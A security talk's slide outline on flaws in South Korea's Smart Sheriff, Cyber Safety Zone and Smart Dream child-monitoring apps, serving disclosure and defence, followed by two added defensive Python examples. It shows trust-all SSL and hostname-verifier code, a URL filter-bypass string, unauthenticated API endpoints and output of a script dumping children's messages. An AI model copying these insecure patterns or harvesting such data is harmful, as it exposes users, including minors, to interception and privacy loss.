  • 50. Citizen Lab publishes the report
  • 51. Some media attention … but reaction was a bit underwhelming
  • 52. „Thanks for the free pentest!“ It kinda backfired… Did we just help improve surveillance software?
  • 54. Fixed Stuff
      • SMS-01-002 Possible Filter-Bypass via unsafe URL check
      • SMS-01-003 No use of any SSL/TLS-based transport security
      • SMS-01-004 Test-Page leaks Data and App-Internals
      • SMS-01-008 Reflected XSS on ssweb.moiba.or.kr
  • 55. Smart Sheriff – How to SSL like a man (SMS-02-008)
        public final void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler, SslError paramSslError) {
            paramSslErrorHandler.proceed();
        }

        implements HostnameVerifier {
            public final boolean verify(String paramString, SSLSession paramSSLSession) {
                return true;
            }
  • 56. Smart Sheriff – Bully API v2.0 (SMS-02-009)
      old: http://api.moiba.or.kr/MessageRequest
      new: https://api.moiba.or.kr/MessageRequest_New
      • New endpoint introduced
      • Old endpoint never deprecated – MOIBA lied
  • 59. Smart Sheriff – Bully API SMS-02-009 API Guess what happened using a different User Agent :D
  • 60. SMS-02-010 API No authentication for the child application. You can still fake the phone usage (kid installs p0rn app) Smart Sheriff – Bully API v2.0
  • 61. Round 2 - Summary
      • They fixed what matters to them (internal dev leaks)
      • They did not fix what affected their users (information leaks, no authentication)
      Seriously: https://cure53.de/pentest-report_smartsheriff-2.pdf
  • 62. Citizen Lab publishes updated report
  • 63. MOIBA reacts and pulls the app
  • 64. News about the app removal
  • 66. But something is shady…
  • 68. Find the difference! 사이버안심존 (Cyber Safety Zone) 스마트보안관 (Smart Sheriff)
  • 72. The new MOIBA – Login for Parents Smart Sheriff / Cyber Safety Zone Smart Dream
  • 73. Web Interface – Cyber Safety Zone
  • 74. Web Interface – Cyber Safety Zone
  • 75. Smart Sheriff / Cyber Safety Zone
      • MOIBA didn't deprecate the API
      • MOIBA renamed the app
      • MOIBA is trying to hide the issues
      But what is up with Smart Dream?
  • 76. Web Interface – Smart Dream
  • 77. Smart Dream Nightmare: Parent vs. Child • Parent-Mode: check messages and searches containing dangerous words • Child-Mode: monitoring SMS/KakaoTalk and Google searches; installs as an accessibility service
  • 78. Smart Dream Nightmare Parent App monitoring SMS Parent Web Backend
  • 79. Responsible Disclosure?
      • MOIBA lied to customers about security fixes.
      • Simply rebranding Smart Sheriff (still vulnerable) - and our reports are public
      • How can we protect the privacy of the children when MOIBA doesn't fix anything when disclosed in private?
      ⇒ We will not disclose technical details. Any research was done with our own test accounts.
  • 80. Smart Dream Nightmare XSS via stored messages
  • 81. +600k Messages from +48k Children
        root@redstar-os $ python nightmare.py
        ### Messages from Child:
        From: ".인터넷" (5)
          1. [KakaoTalk] (violence/gang up): "투명성성인기회"
          2. [KakaoTalk] (blackmail/money): "깡패?"
          3. [KakaoTalk] (violence/맞다): "한!!국교!!"
          4. [KakaoTalk] (blackmail/빌려달라): "보안어린이개방성사랑정?"
          5. [KakaoTalk] (threat/kill): "성인성인괴상한해킹비밀한국성인강남스타일모바일"
        From: ".사이버억압♡" (2)
          1. [KakaoTalk] (rant/crazy girl acting as child): "투명♥♥"
          2. [KakaoTalk] (abuse/fuck it): "비 밀사 이버비?밀번역 조 화정부 기 회개인 성 인 어린이정 ..."
        From: "010XXXXXXXX" (3)
          1. [SMS] (harass/desperate): "어린이강남스?타일인터넷"
          2. [SMS] (harass/): "깡패구글괴상한"
          3. [SMS] (harass/desperate): "부패교육감?"
        From: ".사이버투♥" (3)
          1. [KakaoTalk] (threat/kill): "해킹 평등"
          2. [KakaoTalk] (harass/desperate): "자 기 검열보?"
          3. [KakaoTalk] (violence/gang up): "강남스타일!!!"
  • 82. The Most Offensive Slide :O The 1086 "harmful" words that are monitored by smart dream
  • 83. Another big pile of
      • XSS
      • Lack of Authentication and Authorization
      • Accessing stored messages and searches
      • …
  • 84. A note for reflection
      • Take a step back
      • Imagine these apps were magically 100% secure
      • Would you trust any company or government...
      • ... to have a database with all that information?
  • 85. What's next?
      If you know Korean security researchers, journalists or activists, raise awareness. → Korean society has to deal with these issues
      Have a look at the other child protection applications and relay results to human rights organizations. → perfect project for a university class
      Support organizations like OpenNet Korea, CitizenLab, Open Technology Fund, EFF, …
  • 86. I've learned how virtualization works by hiding p0rn inside VMWare in the early 2000s (and never got busted).
  • 88. Other Korean Child Protection Apps
      • SKTelecom: https://play.google.com/store/apps/details?id=com.skt.thug.hazard&hl=ko
      • KT Corporation: https://play.google.com/store/apps/details?id=com.kt.ollehkidsafe&hl=ko
      • LG U+: https://play.google.com/store/apps/details?id=com.lguplus.cleanmobile&hl=ko
      • …
  • 89. Reports
      • [20 September 2015] Are the Kids Alright? Digital Risks to Minors from South Korea’s Smart Sheriff Application - https://citizenlab.org/2015/09/digital-risks-south-korea-smart-sheriff/
      • [1 November 2015] The Kids are Still at Risk: Update to Citizen Lab’s “Are the Kids Alright?” Smart Sheriff report - https://citizenlab.org/2015/11/smart-sheriff-update/
      • [21 September 2015] Submission to the 113th Session of the UN Human Rights Committee for Fourth Periodic Report of the Republic of Korea - http://opennetkorea.org/en/wp/wp-content/uploads/2016/03/INT_CCPR__KOR_OPEN_NETSmart-Sheriff.pdf
  • 90. Some News Articles
      • [19 May 2015] Don’t text ‘beer’ in Korea: Words that trigger teen alerts - http://www.japantimes.co.jp/news/2015/05/19/asia-pacific/dont-text-beer-korea-words-trigger-teen-alerts/
      • [16 June 2015] South Korea provokes teenage smartphone privacy row - http://www.bbc.com/news/technology-33091990
      • [21 September 2015] Smart Sheriff child surveillance app leaves South Korean kids vulnerable to hackers - http://www.cbc.ca/news/technology/smart-sheriff-1.3236682
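A defender-side companion to slides 40 and 41, added here and not code from the talk, the Cure53 reports or MOIBA: an unauthenticated member-info endpoint lets one client walk the phone-number space, so the server side can at least spot it in its logs. The access-log format (ISO time, client IP, JSON request body), the IPs and every number below are constructed for this example; the JSON field names follow the request on slide 39.

```python
"""Detect phone-number enumeration against an unauthenticated lookup API.

Added example (not from the talk or the reports). A CLT_MBR_GETCLIENTMEMBERINFO
request answers for any MOBILE value, so we flag clients that ask for many
different numbers within a short window. Log format and data are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import json

LOOKUP_ACTION = "CLT_MBR_GETCLIENTMEMBERINFO"

# Constructed sample log: one client walks five numbers in five seconds,
# one re-polls its own number, one looks up four numbers 100 s apart.
SAMPLE_LOG = """\
2015-10-15T17:05:20 203.0.113.7 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000001","DEVICE_ID":"unknown"}
2015-10-15T17:05:21 203.0.113.7 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000002","DEVICE_ID":"unknown"}
2015-10-15T17:05:22 203.0.113.7 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000003","DEVICE_ID":"unknown"}
2015-10-15T17:05:23 203.0.113.7 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000004","DEVICE_ID":"unknown"}
2015-10-15T17:05:24 203.0.113.7 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000005","DEVICE_ID":"unknown"}
2015-10-15T17:05:30 198.51.100.9 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01099990001","DEVICE_ID":"dev-1"}
2015-10-15T17:06:10 198.51.100.9 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01099990001","DEVICE_ID":"dev-1"}
2015-10-15T17:10:00 192.0.2.5 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000011","DEVICE_ID":"unknown"}
2015-10-15T17:11:40 192.0.2.5 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000012","DEVICE_ID":"unknown"}
2015-10-15T17:13:20 192.0.2.5 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000013","DEVICE_ID":"unknown"}
2015-10-15T17:15:00 192.0.2.5 {"action":"CLT_MBR_GETCLIENTMEMBERINFO","MOBILE":"01000000014","DEVICE_ID":"unknown"}
"""


def parse_line(line):
    """Split 'time ip json' into (datetime, ip, request dict)."""
    ts, ip, body = line.split(" ", 2)
    return datetime.fromisoformat(ts), ip, json.loads(body)


def find_enumerators(log_text, window_seconds=60, threshold=5):
    """Return {client_ip: peak distinct MOBILE count} for every client that,
    within any window of `window_seconds`, looked up >= `threshold` numbers."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)  # ip -> [(timestamp, mobile), ...]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, req = parse_line(line)
        if req.get("action") == LOOKUP_ACTION:
            events[ip].append((ts, req.get("MOBILE", "")))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        peak, start = 0, 0
        for end in range(len(evs)):
            # slide the left edge until the window spans at most `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            peak = max(peak, len({m for _, m in evs[start:end + 1]}))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, n in find_enumerators(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} distinct numbers looked up within 60 s")
```

A fix, not a detection, is to bind the lookup to the authenticated device and refuse requests whose MOBILE is not the caller's own; the detector above is what you run while that fix is outstanding.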
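The URL check from slide 44 (finding SMS-01-002), as an added example that is not the app's code: the shipped substring condition is mirrored in Python beside a host-based version, and both are run over the two URLs from the slide plus a few constructed edge cases. The hardened function is this example's own, not MOIBA's fix.

```python
"""Slide 44's URL filter: substring match versus parsed-host match.

Added example, not code from the app, the talk or the Cure53 reports. The
shipped check is mirrored as written on slide 44; the hardened version is this
example's own and compares the parsed hostname with the single allowed host
instead of searching for that string anywhere in the URL.
"""
from urllib.parse import urlsplit

ALLOWED_HOST = "ssweb.moiba.or.kr"


def blocked_as_shipped(url):
    """Mirror of the condition on slide 44: True means the WebView does not
    load the URL itself. The allow decision is a plain substring search."""
    return (url.startswith("market://") or url.startswith("tel:")
            or (url.startswith("http") and ALLOWED_HOST not in url))


def blocked_hardened(url):
    """Same decision taken on the parsed URL: the hostname (lower-cased, with
    port and userinfo stripped by urlsplit) must equal the allowed host;
    market:/tel: are still handed off; any other scheme fails closed."""
    parts = urlsplit(url)
    if parts.scheme in ("market", "tel"):
        return True
    if parts.scheme in ("http", "https"):
        return parts.hostname != ALLOWED_HOST
    return True


# Constructed URLs: the two from slide 44 plus the usual allowlist edge cases.
SAMPLES = [
    "http://blocked.com",                          # slide 44: blocked
    "http://blocked.com/?blah=ssweb.moiba.or.kr",  # slide 44: allowed :D
    "https://ssweb.moiba.or.kr/main/childList",    # the intended site
    "https://SSWEB.MOIBA.OR.KR:443/main",          # same site, other spelling
    "http://ssweb.moiba.or.kr.example.net/",       # look-alike subdomain
    "http://ssweb.moiba.or.kr@example.net/",       # host string in userinfo
    "data:text/html,hello",                        # scheme neither check names
]


def compare(urls=SAMPLES):
    """Return [(url, blocked_as_shipped, blocked_hardened)] for inspection."""
    return [(u, blocked_as_shipped(u), blocked_hardened(u)) for u in urls]


if __name__ == "__main__":
    print("shipped hardened url")
    for url, shipped, hardened in compare():
        print(f"{'BLOCK' if shipped else 'allow':7} "
              f"{'BLOCK' if hardened else 'allow':8} {url}")
```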